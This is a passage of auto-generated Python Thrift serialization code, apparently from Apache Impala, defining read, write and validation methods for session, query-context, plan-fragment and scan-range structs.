iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 3: if ftype == TType.STRUCT: self.session_id = Types.ttypes.TUniqueId() self.session_id.read(iprot) else: iprot.skip(ftype) elif fid == 5: if ftype == TType.I32: self.session_type = iprot.readI32(); else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRING: self.database = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRING: self.connected_user = iprot.readString(); else: iprot.skip(ftype) elif fid == 6: if ftype == TType.STRING: self.delegated_user = iprot.readString(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRUCT: self.network_address = Types.ttypes.TNetworkAddress() self.network_address.read(iprot) else: iprot.skip(ftype) elif fid == 7: if ftype == TType.I64: self.kudu_latest_observed_ts = iprot.readI64(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TSessionState') if self.database is not None: oprot.writeFieldBegin('database', TType.STRING, 1) oprot.writeString(self.database) oprot.writeFieldEnd() if self.connected_user is not None: oprot.writeFieldBegin('connected_user', TType.STRING, 2) oprot.writeString(self.connected_user) oprot.writeFieldEnd() if self.session_id is not None: oprot.writeFieldBegin('session_id', TType.STRUCT, 3) self.session_id.write(oprot) oprot.writeFieldEnd() if self.network_address is not None: oprot.writeFieldBegin('network_address', TType.STRUCT, 4) self.network_address.write(oprot) oprot.writeFieldEnd() if self.session_type is not None: oprot.writeFieldBegin('session_type', TType.I32, 5) oprot.writeI32(self.session_type) oprot.writeFieldEnd() if self.delegated_user is not None: oprot.writeFieldBegin('delegated_user', TType.STRING, 6) oprot.writeString(self.delegated_user) oprot.writeFieldEnd() if self.kudu_latest_observed_ts is not None: oprot.writeFieldBegin('kudu_latest_observed_ts', TType.I64, 7) oprot.writeI64(self.kudu_latest_observed_ts) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.session_id is None: raise TProtocol.TProtocolException(message='Required field session_id is unset!') if self.session_type is None: raise TProtocol.TProtocolException(message='Required field session_type is unset!') if self.database is None: raise TProtocol.TProtocolException(message='Required field database is unset!') if self.connected_user is None: raise TProtocol.TProtocolException(message='Required field connected_user is unset!') if self.network_address is None: raise TProtocol.TProtocolException(message='Required field network_address is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TClientRequest: """ Attributes: - stmt - query_options - redacted_stmt """ thrift_spec = ( None, # 0 (1, TType.STRING, 'stmt', None, None, ), # 1 (2, TType.STRUCT, 'query_options', (TQueryOptions, TQueryOptions.thrift_spec), None, ), # 2 (3, TType.STRING, 'redacted_stmt', None, None, ), # 3 ) def __init__(self, stmt=None, query_options=None, redacted_stmt=None,): self.stmt = stmt self.query_options = query_options self.redacted_stmt = redacted_stmt def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.stmt = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.query_options = TQueryOptions() self.query_options.read(iprot) else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRING: self.redacted_stmt = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TClientRequest') if self.stmt is not None: oprot.writeFieldBegin('stmt', TType.STRING, 1) oprot.writeString(self.stmt) oprot.writeFieldEnd() if self.query_options is not None: oprot.writeFieldBegin('query_options', TType.STRUCT, 2) self.query_options.write(oprot) oprot.writeFieldEnd() if self.redacted_stmt is not None: oprot.writeFieldBegin('redacted_stmt', TType.STRING, 3) oprot.writeString(self.redacted_stmt) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.stmt is None: raise TProtocol.TProtocolException(message='Required field stmt is unset!') if self.query_options is None: raise TProtocol.TProtocolException(message='Required field query_options is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TDebugOptions: """ Attributes: - node_id - phase - action - action_param """ thrift_spec = ( None, # 0 (1, TType.I32, 'node_id', None, None, ), # 1 (2, TType.I32, 'phase', None, None, ), # 2 (3, TType.I32, 'action', None, None, ), # 3 (4, TType.STRING, 'action_param', None, None, ), # 4 ) def __init__(self, node_id=None, phase=None, action=None, action_param=None,): self.node_id = node_id self.phase = phase self.action = action self.action_param = action_param def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.node_id = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I32: self.phase = iprot.readI32(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.I32: self.action = iprot.readI32(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRING: self.action_param = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TDebugOptions') if self.node_id is not None: oprot.writeFieldBegin('node_id', TType.I32, 1) oprot.writeI32(self.node_id) oprot.writeFieldEnd() if self.phase is not None: oprot.writeFieldBegin('phase', TType.I32, 2) oprot.writeI32(self.phase) oprot.writeFieldEnd() if self.action is not None: oprot.writeFieldBegin('action', TType.I32, 3) oprot.writeI32(self.action) oprot.writeFieldEnd() if self.action_param is not None: oprot.writeFieldBegin('action_param', TType.STRING, 4) oprot.writeString(self.action_param) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TQueryCtx: """ Attributes: - client_request - query_id - session - now_string - pid - coord_address - tables_missing_stats - disable_spilling - parent_query_id - tables_with_corrupt_stats - snapshot_timestamp - desc_tbl - start_unix_millis - disable_codegen_hint - tables_missing_diskids - request_pool - utc_timestamp_string """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'client_request', (TClientRequest, TClientRequest.thrift_spec), None, ), # 1 (2, TType.STRUCT, 'query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 2 (3, TType.STRUCT, 'session', (TSessionState, TSessionState.thrift_spec), None, ), # 3 (4, TType.STRING, 'now_string', None, None, ), # 4 (5, TType.I32, 'pid', None, None, ), # 5 (6, TType.STRUCT, 'coord_address', (Types.ttypes.TNetworkAddress, Types.ttypes.TNetworkAddress.thrift_spec), None, ), # 6 (7, TType.LIST, 'tables_missing_stats', (TType.STRUCT,(CatalogObjects.ttypes.TTableName, CatalogObjects.ttypes.TTableName.thrift_spec)), None, ), # 7 (8, TType.BOOL, 'disable_spilling', None, None, ), # 8 (9, TType.STRUCT, 'parent_query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 9 (10, TType.LIST, 'tables_with_corrupt_stats', (TType.STRUCT,(CatalogObjects.ttypes.TTableName, CatalogObjects.ttypes.TTableName.thrift_spec)), None, ), # 10 (11, TType.I64, 'snapshot_timestamp', None, -1, ), # 11 (12, TType.STRUCT, 'desc_tbl', (Descriptors.ttypes.TDescriptorTable, Descriptors.ttypes.TDescriptorTable.thrift_spec), None, ), # 12 (13, TType.I64, 'start_unix_millis', None, None, ), # 13 (14, TType.BOOL, 'disable_codegen_hint', None, False, ), # 14 (15, TType.LIST, 'tables_missing_diskids', (TType.STRUCT,(CatalogObjects.ttypes.TTableName, CatalogObjects.ttypes.TTableName.thrift_spec)), None, ), # 15 (16, TType.STRING, 'request_pool', None, None, ), # 16 (17, TType.STRING, 'utc_timestamp_string', None, None, ), # 17 ) def __init__(self, client_request=None, query_id=None, session=None, now_string=None, pid=None, coord_address=None, tables_missing_stats=None, disable_spilling=None, parent_query_id=None, tables_with_corrupt_stats=None, snapshot_timestamp=thrift_spec[11][4], desc_tbl=None, start_unix_millis=None, disable_codegen_hint=thrift_spec[14][4], tables_missing_diskids=None, request_pool=None, utc_timestamp_string=None,): self.client_request = client_request self.query_id = query_id self.session = session self.now_string = now_string self.pid = pid self.coord_address = coord_address self.tables_missing_stats = tables_missing_stats self.disable_spilling = disable_spilling self.parent_query_id = parent_query_id self.tables_with_corrupt_stats = tables_with_corrupt_stats self.snapshot_timestamp = snapshot_timestamp self.desc_tbl = desc_tbl self.start_unix_millis = start_unix_millis self.disable_codegen_hint = disable_codegen_hint self.tables_missing_diskids = tables_missing_diskids self.request_pool = request_pool self.utc_timestamp_string = utc_timestamp_string def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.client_request = TClientRequest() self.client_request.read(iprot) else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.query_id = Types.ttypes.TUniqueId() self.query_id.read(iprot) else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.session = TSessionState() self.session.read(iprot) else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRING: self.now_string = iprot.readString(); else: iprot.skip(ftype) elif fid == 5: if ftype == TType.I32: self.pid = iprot.readI32(); else: iprot.skip(ftype) elif fid == 6: if ftype == TType.STRUCT: self.coord_address = Types.ttypes.TNetworkAddress() self.coord_address.read(iprot) else: iprot.skip(ftype) elif fid == 7: if ftype == TType.LIST: self.tables_missing_stats = [] (_etype3, _size0) = iprot.readListBegin() for _i4 in xrange(_size0): _elem5 = CatalogObjects.ttypes.TTableName() _elem5.read(iprot) self.tables_missing_stats.append(_elem5) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 8: if ftype == TType.BOOL: self.disable_spilling = iprot.readBool(); else: iprot.skip(ftype) elif fid == 9: if ftype == TType.STRUCT: self.parent_query_id = Types.ttypes.TUniqueId() self.parent_query_id.read(iprot) else: iprot.skip(ftype) elif fid == 10: if ftype == TType.LIST: self.tables_with_corrupt_stats = [] (_etype9, _size6) = iprot.readListBegin() for _i10 in xrange(_size6): _elem11 = CatalogObjects.ttypes.TTableName() _elem11.read(iprot) self.tables_with_corrupt_stats.append(_elem11) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 11: if ftype == TType.I64: self.snapshot_timestamp = iprot.readI64(); else: iprot.skip(ftype) elif fid == 12: if ftype == TType.STRUCT: self.desc_tbl = Descriptors.ttypes.TDescriptorTable() self.desc_tbl.read(iprot) else: iprot.skip(ftype) elif fid == 13: if ftype == TType.I64: self.start_unix_millis = iprot.readI64(); else: iprot.skip(ftype) elif fid == 14: if ftype == TType.BOOL: self.disable_codegen_hint = iprot.readBool(); else: iprot.skip(ftype) elif fid == 15: if ftype == TType.LIST: self.tables_missing_diskids = [] (_etype15, _size12) = iprot.readListBegin() for _i16 in xrange(_size12): _elem17 = CatalogObjects.ttypes.TTableName() _elem17.read(iprot) self.tables_missing_diskids.append(_elem17) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 16: if ftype == TType.STRING: self.request_pool = iprot.readString(); else: iprot.skip(ftype) elif fid == 17: if ftype == TType.STRING: self.utc_timestamp_string = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TQueryCtx') if self.client_request is not None: oprot.writeFieldBegin('client_request', TType.STRUCT, 1) self.client_request.write(oprot) oprot.writeFieldEnd() if self.query_id is not None: oprot.writeFieldBegin('query_id', TType.STRUCT, 2) self.query_id.write(oprot) oprot.writeFieldEnd() if self.session is not None: oprot.writeFieldBegin('session', TType.STRUCT, 3) self.session.write(oprot) oprot.writeFieldEnd() if self.now_string is not None: oprot.writeFieldBegin('now_string', TType.STRING, 4) oprot.writeString(self.now_string) oprot.writeFieldEnd() if self.pid is not None: oprot.writeFieldBegin('pid', TType.I32, 5) oprot.writeI32(self.pid) oprot.writeFieldEnd() if self.coord_address is not None: oprot.writeFieldBegin('coord_address', TType.STRUCT, 6) self.coord_address.write(oprot) oprot.writeFieldEnd() if self.tables_missing_stats is not None: oprot.writeFieldBegin('tables_missing_stats', TType.LIST, 7) oprot.writeListBegin(TType.STRUCT, len(self.tables_missing_stats)) for iter18 in self.tables_missing_stats: iter18.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() if self.disable_spilling is not None: oprot.writeFieldBegin('disable_spilling', TType.BOOL, 8) oprot.writeBool(self.disable_spilling) oprot.writeFieldEnd() if self.parent_query_id is not None: oprot.writeFieldBegin('parent_query_id', TType.STRUCT, 9) self.parent_query_id.write(oprot) oprot.writeFieldEnd() if self.tables_with_corrupt_stats is not None: oprot.writeFieldBegin('tables_with_corrupt_stats', TType.LIST, 10) oprot.writeListBegin(TType.STRUCT, len(self.tables_with_corrupt_stats)) for iter19 in self.tables_with_corrupt_stats: iter19.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() if self.snapshot_timestamp is not None: oprot.writeFieldBegin('snapshot_timestamp', TType.I64, 11) oprot.writeI64(self.snapshot_timestamp) oprot.writeFieldEnd() if self.desc_tbl is not None: oprot.writeFieldBegin('desc_tbl', TType.STRUCT, 12) self.desc_tbl.write(oprot) oprot.writeFieldEnd() if self.start_unix_millis is not None: oprot.writeFieldBegin('start_unix_millis', TType.I64, 13) oprot.writeI64(self.start_unix_millis) oprot.writeFieldEnd() if self.disable_codegen_hint is not None: oprot.writeFieldBegin('disable_codegen_hint', TType.BOOL, 14) oprot.writeBool(self.disable_codegen_hint) oprot.writeFieldEnd() if self.tables_missing_diskids is not None: oprot.writeFieldBegin('tables_missing_diskids', TType.LIST, 15) oprot.writeListBegin(TType.STRUCT, len(self.tables_missing_diskids)) for iter20 in self.tables_missing_diskids: iter20.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() if self.request_pool is not None: oprot.writeFieldBegin('request_pool', TType.STRING, 16) oprot.writeString(self.request_pool) oprot.writeFieldEnd() if self.utc_timestamp_string is not None: oprot.writeFieldBegin('utc_timestamp_string', TType.STRING, 17) oprot.writeString(self.utc_timestamp_string) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.client_request is None: raise TProtocol.TProtocolException(message='Required field client_request is unset!') if self.query_id is None: raise TProtocol.TProtocolException(message='Required field query_id is unset!') if self.session is None: raise TProtocol.TProtocolException(message='Required field session is unset!') if self.now_string is None: raise TProtocol.TProtocolException(message='Required field now_string is unset!') if self.pid is None: raise TProtocol.TProtocolException(message='Required field pid is unset!') if self.start_unix_millis is None: raise TProtocol.TProtocolException(message='Required field start_unix_millis is unset!') if self.utc_timestamp_string is None: raise TProtocol.TProtocolException(message='Required field utc_timestamp_string is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TPlanFragmentDestination: """ Attributes: - fragment_instance_id - server - krpc_server """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'fragment_instance_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 1 (2, TType.STRUCT, 'server', (Types.ttypes.TNetworkAddress, Types.ttypes.TNetworkAddress.thrift_spec), None, ), # 2 (3, TType.STRUCT, 'krpc_server', (Types.ttypes.TNetworkAddress, Types.ttypes.TNetworkAddress.thrift_spec), None, ), # 3 ) def __init__(self, fragment_instance_id=None, server=None, krpc_server=None,): self.fragment_instance_id = fragment_instance_id self.server = server self.krpc_server = krpc_server def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.fragment_instance_id = Types.ttypes.TUniqueId() self.fragment_instance_id.read(iprot) else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.server = Types.ttypes.TNetworkAddress() self.server.read(iprot) else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.krpc_server = Types.ttypes.TNetworkAddress() self.krpc_server.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TPlanFragmentDestination') if self.fragment_instance_id is not None: oprot.writeFieldBegin('fragment_instance_id', TType.STRUCT, 1) self.fragment_instance_id.write(oprot) oprot.writeFieldEnd() if self.server is not None: oprot.writeFieldBegin('server', TType.STRUCT, 2) self.server.write(oprot) oprot.writeFieldEnd() if self.krpc_server is not None: oprot.writeFieldBegin('krpc_server', TType.STRUCT, 3) self.krpc_server.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.fragment_instance_id is None: raise TProtocol.TProtocolException(message='Required field fragment_instance_id is unset!') if self.server is None: raise TProtocol.TProtocolException(message='Required field server is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TPlanFragmentCtx: """ Attributes: - fragment - destinations """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'fragment', (Planner.ttypes.TPlanFragment, Planner.ttypes.TPlanFragment.thrift_spec), None, ), # 1 (2, TType.LIST, 'destinations', (TType.STRUCT,(TPlanFragmentDestination, TPlanFragmentDestination.thrift_spec)), None, ), # 2 ) def __init__(self, fragment=None, destinations=None,): self.fragment = fragment self.destinations = destinations def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.fragment = Planner.ttypes.TPlanFragment() self.fragment.read(iprot) else: iprot.skip(ftype) elif fid == 2: if ftype == TType.LIST: self.destinations = [] (_etype24, _size21) = iprot.readListBegin() for _i25 in xrange(_size21): _elem26 = TPlanFragmentDestination() _elem26.read(iprot) self.destinations.append(_elem26) iprot.readListEnd() else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TPlanFragmentCtx') if self.fragment is not None: oprot.writeFieldBegin('fragment', TType.STRUCT, 1) self.fragment.write(oprot) oprot.writeFieldEnd() if self.destinations is not None: oprot.writeFieldBegin('destinations', TType.LIST, 2) oprot.writeListBegin(TType.STRUCT, len(self.destinations)) for iter27 in self.destinations: iter27.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.fragment is None: raise TProtocol.TProtocolException(message='Required field fragment is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TScanRangeParams: """ Attributes: - scan_range - volume_id - is_cached - is_remote """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'scan_range', (PlanNodes.ttypes.TScanRange, PlanNodes.ttypes.TScanRange.thrift_spec), None, ), # 1 (2, TType.I32, 'volume_id', None, -1, ), # 2 (3, TType.BOOL, 'is_cached', None, False, ), # 3 (4, TType.BOOL, 'is_remote', None, None, ), # 4 ) def __init__(self, scan_range=None, volume_id=thrift_spec[2][4], is_cached=thrift_spec[3][4], is_remote=None,): self.scan_range = scan_range self.volume_id = volume_id self.is_cached = is_cached self.is_remote = is_remote def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.scan_range = PlanNodes.ttypes.TScanRange() self.scan_range.read(iprot) else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I32: self.volume_id = iprot.readI32(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.BOOL: self.is_cached = iprot.readBool(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.BOOL: self.is_remote = iprot.readBool(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TScanRangeParams') if self.scan_range is not None: oprot.writeFieldBegin('scan_range', TType.STRUCT, 1) self.scan_range.write(oprot) oprot.writeFieldEnd() if self.volume_id is not None: oprot.writeFieldBegin('volume_id', TType.I32, 2) oprot.writeI32(self.volume_id) oprot.writeFieldEnd() if self.is_cached is not None: oprot.writeFieldBegin('is_cached', TType.BOOL, 3) oprot.writeBool(self.is_cached) oprot.writeFieldEnd() if self.is_remote is not None: oprot.writeFieldBegin('is_remote', TType.BOOL, 4) oprot.writeBool(self.is_remote) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.scan_range is None: raise TProtocol.TProtocolException(message='Required field scan_range is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TPlanFragmentInstanceCtx: """ Attributes: - fragment_idx - fragment_instance_id - per_fragment_instance_idx - per_node_scan_ranges - per_exch_num_senders - sender_id - debug_options """ thrift_spec = ( None, # 0 (1, TType.I32, 'fragment_idx', None, None, ), # 1 (2, TType.STRUCT, 'fragment_instance_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 2 (3, TType.I32, 'per_fragment_instance_idx', None, None, ), # 3 (4, TType.MAP, 'per_node_scan_ranges', (TType.I32,None,TType.LIST,(TType.STRUCT,(TScanRangeParams, TScanRangeParams.thrift_spec))), None, ), # 4 (5, TType.MAP, 'per_exch_num_senders', (TType.I32,None,TType.I32,None), None, ), # 5 (6, TType.I32, 'sender_id', None, None, ), # 6 (7, TType.STRUCT, 'debug_options', (TDebugOptions, TDebugOptions.thrift_spec), None, ), # 7 ) def __init__(self, fragment_idx=None, fragment_instance_id=None, per_fragment_instance_idx=None, per_node_scan_ranges=None, per_exch_num_senders=None, sender_id=None, debug_options=None,): self.fragment_idx = fragment_idx self.fragment_instance_id = fragment_instance_id self.per_fragment_instance_idx = per_fragment_instance_idx self.per_node_scan_ranges = per_node_scan_ranges self.per_exch_num_senders = per_exch_num_senders self.sender_id = sender_id self.debug_options = debug_options def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.fragment_idx = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.fragment_instance_id = Types.ttypes.TUniqueId() self.fragment_instance_id.read(iprot) else: iprot.skip(ftype) elif fid == 3: if ftype == TType.I32: self.per_fragment_instance_idx = iprot.readI32(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.MAP: self.per_node_scan_ranges = {} (_ktype29, _vtype30, _size28 ) = iprot.readMapBegin() for _i32 in xrange(_size28): _key33 = iprot.readI32(); _val34 = [] (_etype38, _size35) = iprot.readListBegin() for _i39 in xrange(_size35): _elem40 = TScanRangeParams() _elem40.read(iprot) _val34.append(_elem40) iprot.readListEnd() self.per_node_scan_ranges[_key33] = _val34 iprot.readMapEnd() else: iprot.skip(ftype) elif fid == 5: if ftype == TType.MAP: self.per_exch_num_senders = {} (_ktype42, _vtype43, _size41 ) = iprot.readMapBegin() for _i45 in xrange(_size41): _key46 = iprot.readI32(); _val47 = iprot.readI32(); self.per_exch_num_senders[_key46] = _val47 iprot.readMapEnd() else: iprot.skip(ftype) elif fid == 6: if ftype == TType.I32: self.sender_id = iprot.readI32(); else: iprot.skip(ftype) elif fid == 7: if ftype == TType.STRUCT: self.debug_options = TDebugOptions() self.debug_options.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TPlanFragmentInstanceCtx') if self.fragment_idx is not None: oprot.writeFieldBegin('fragment_idx', TType.I32, 1) oprot.writeI32(self.fragment_idx) oprot.writeFieldEnd() if self.fragment_instance_id is not None: oprot.writeFieldBegin('fragment_instance_id', TType.STRUCT, 2) self.fragment_instance_id.write(oprot) oprot.writeFieldEnd() if self.per_fragment_instance_idx is not None: oprot.writeFieldBegin('per_fragment_instance_idx', TType.I32, 3) oprot.writeI32(self.per_fragment_instance_idx) oprot.writeFieldEnd() if self.per_node_scan_ranges is not None: oprot.writeFieldBegin('per_node_scan_ranges', TType.MAP, 4) oprot.writeMapBegin(TType.I32, TType.LIST, len(self.per_node_scan_ranges)) for kiter48,viter49 in self.per_node_scan_ranges.items(): oprot.writeI32(kiter48) oprot.writeListBegin(TType.STRUCT, len(viter49)) for iter50 in viter49: iter50.write(oprot) oprot.writeListEnd() oprot.writeMapEnd() oprot.writeFieldEnd() if self.per_exch_num_senders is not None: oprot.writeFieldBegin('per_exch_num_senders', TType.MAP, 5) oprot.writeMapBegin(TType.I32, TType.I32, len(self.per_exch_num_senders)) for kiter51,viter52 in self.per_exch_num_senders.items(): oprot.writeI32(kiter51) oprot.writeI32(viter52) oprot.writeMapEnd() oprot.writeFieldEnd() if self.sender_id is not None: oprot.writeFieldBegin('sender_id', TType.I32, 6) oprot.writeI32(self.sender_id) oprot.writeFieldEnd() if self.debug_options is not None: oprot.writeFieldBegin('debug_options', TType.STRUCT, 7) self.debug_options.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.fragment_idx is None: raise TProtocol.TProtocolException(message='Required field fragment_idx is unset!') if self.fragment_instance_id is None: raise TProtocol.TProtocolException(message='Required field fragment_instance_id is unset!') if self.per_fragment_instance_idx is None: raise TProtocol.TProtocolException(message='Required field 